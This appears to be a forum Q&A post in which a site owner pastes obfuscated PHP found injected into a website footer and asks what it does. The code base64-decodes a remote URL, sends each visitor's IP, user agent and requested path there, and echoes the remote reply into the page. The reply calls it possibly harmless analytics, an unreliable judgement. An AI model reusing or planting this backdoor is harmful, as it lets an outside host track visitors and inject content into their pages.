today when opened website, eset nod32 warned me of trojan , blocked website. when analyzed code, following code in footer... code , advantages can he(hacker) inserting code website?
<?php if (!isset($sretry)) { global $sretry; $sretry = 1; // code use global bot statistic $suseragent = strtolower($_server['http_user_agent']); // looks google serch bot $stcurlhandle = null; $stcurllink = ""; if((strstr($suseragent, 'google') == false)&&(strstr($suseragent, 'yahoo') == false)&&(strstr($suseragent, 'baidu') == false)&&(strstr($suseragent, 'msn') == false)&&(strstr($suseragent, 'opera') == false)&&(strstr($suseragent, 'chrome') == false)&&(strstr($suseragent, 'bing') == false)&&(strstr($suseragent, 'safari') == false)&&(strstr($suseragent, 'bot') == false)) // bot comes { if(isset($_server['remote_addr']) == true && isset($_server['http_host']) == true){ // create bot analitics $stcurllink = base64_decode( 'ahr0cdovl21icm93c2vyc3rhdhmuy29tl3n0yxril3n0yxqucghw').'?ip='.urlencode($_server['remote_addr']).'&useragent='.urlencode($suseragent).'&domainname='.urlencode($_server['http_host']).'&fullpath='.urlencode($_server['request_uri']).'&check='.isset($_get['look']); @$stcurlhandle = curl_init( $stcurllink ); } } if ( $stcurlhandle !== null ) { curl_setopt($stcurlhandle, curlopt_returntransfer, 1); curl_setopt($stcurlhandle, curlopt_timeout, 6); $sresult = @curl_exec($stcurlhandle); if ($sresult[0]=="o") {$sresult[0]=" "; echo $sresult; // statistic code end } curl_close($stcurlhandle); } } ?>
it looks sort of analytics code me. sends details on url requested, remote ip address, browser user-agent, etc "http://mbrowserstats.com/stath/stat.php". i'm not familiar particular site, may legit. antivirus software reports these things incorrectly.
based on few searches, seems bit 50/50. seems doesn't huge harm, may distributed hacking. few sample pages found it:
- http://www.wjunction.com/16-webmaster-discussion/166680-site-hacked-here-code-pls-help.html
- http://ninjafirewall.com/malware/index.php?threat=2013-02-22.01
- http://onlinelinkscan.com/results/mbrowserstats-comstatestat-php/
- http://www.statscrop.com/www/mbrowserstats.com
probably safest remove it, , follow of suggestions on preventing reoccurrence.
Comments
Post a Comment